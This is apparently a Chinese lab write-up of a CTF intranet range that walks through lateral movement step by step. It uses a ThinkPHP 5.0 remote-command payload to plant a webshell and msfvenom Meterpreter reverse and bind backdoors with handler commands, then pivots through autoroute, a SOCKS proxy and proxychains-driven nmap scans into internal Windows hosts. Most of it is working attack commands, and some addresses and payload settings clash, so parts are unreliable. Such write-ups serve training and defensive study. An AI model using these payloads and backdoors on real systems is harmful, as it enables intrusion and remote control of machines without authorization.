内网安全——域横向内网漫游

复现环境: CFS三层内网漫游安全测试演练——某CTF线下2019 内网安全——域横向内网漫游
文章图片


kail (192.168.174.130)
虚拟机web服务器:kail (192.168.174.151、192.168.2.100)、windows2008(192.168.2.2、192.168.3.2)
1、访问虚拟服务器靶机192.168.174.151发现为ThinkPHP5.0版本,这里可以利用ThinkPHP命令执行漏洞上传webshell后门。
内网安全——域横向内网漫游
文章图片

2、 利用Payload写入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^ >shell.php

在靶机查看发现成功上传webshell
内网安全——域横向内网漫游
文章图片

3、kail上利用蚁剑连接webshell
内网安全——域横向内网漫游
文章图片

4、kail生成后门
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t2.elf

内网安全——域横向内网漫游
文章图片

5、kail上进入msfconsile,接收反弹
use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset LHOST 192.168.76.132set LPORT 1111exploit

内网安全——域横向内网漫游
文章图片

6、在蚁剑工具上上传刚刚生成的木马文件
内网安全——域横向内网漫游
文章图片

7、在蚁剑的虚拟终端处使用命令执行木马文件
chmod +x t2.elf#给予文件执行权限 ./t2.elf#执行木马文件

内网安全——域横向内网漫游
文章图片

8、kail成功接收到反弹对话框
内网安全——域横向内网漫游
文章图片

9、在反弹对话框进行信息收集及配置访问
获取网络接口:run get_local_subnets查看路由地址:run autoroute -p添加路由地址:run autoroute -s 192.168.2.0/24

内网安全——域横向内网漫游
文章图片

10、开启msf本地代理
use auxiliary/server/socks_proxyset srvport 2222exploit

内网安全——域横向内网漫游
文章图片

11、配置 proxychains 后调用工具探针 windows2008网站地址
vi /etc/proxychains.conf在最下面添加socks4 192.168.76.132 2222proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。-sT:扫描 TCP 数据包已建立的连接 connect

12、利用本地代理接口访问测试
设置浏览器代理进行访问测试,成功访问网站
内网安全——域横向内网漫游
文章图片

内网安全——域横向内网漫游
文章图片

12、同理,利用windows2008网站漏洞上传webshell后门文件(因为条件有限没有搭建有漏洞的网站,有兴趣的可以自行搭建上传木马步骤和上面一样,这里直接创建木马文件在网站目录下)
内网安全——域横向内网漫游
文章图片

13、在kail上利用蚁剑工具自带的代理设置设置代理连接192.168.2.2主机,测试成功连接
内网安全——域横向内网漫游
文章图片

内网安全——域横向内网漫游
文章图片

14、在kail上生成正向后门,通过蚁剑上传给win2008,因为win2008和攻击机不在同一个网段无法反向连接到我们,所有生成一个正向后门绑定端口为3333进行连接
msfvenom -p windows/meterpreter/bind_tcp LPORT=3333 -f exe -o 123.exe

内网安全——域横向内网漫游
文章图片

内网安全——域横向内网漫游
文章图片

15、配置msf访问接受
use exploit/multi/handlerset payload linux/x64/meterpreter/bind_tcpset rhost 192.168.2.2set LPORT 3333exploit

内网安全——域横向内网漫游
文章图片
16、 蚁剑虚拟终端运行后门文件,成功接收到会话
17、继续进行信息收集及配置访问
获取网络接口:run get_local_subnets查看路由地址:run autoroute -p添加路由地址:run autoroute -s 192.168.3.0/24

【内网安全——域横向内网漫游】内网安全——域横向内网漫游
文章图片

18、测试成功打开192.168.3.2所在的网站(可以再搭建多个虚拟机服务器靶机,进行攻击,同理一样利用网站漏洞或者系统漏洞上传木马实现控制,重点是使用代理技术实现内网攻击)内网安全——域横向内网漫游
文章图片








    推荐阅读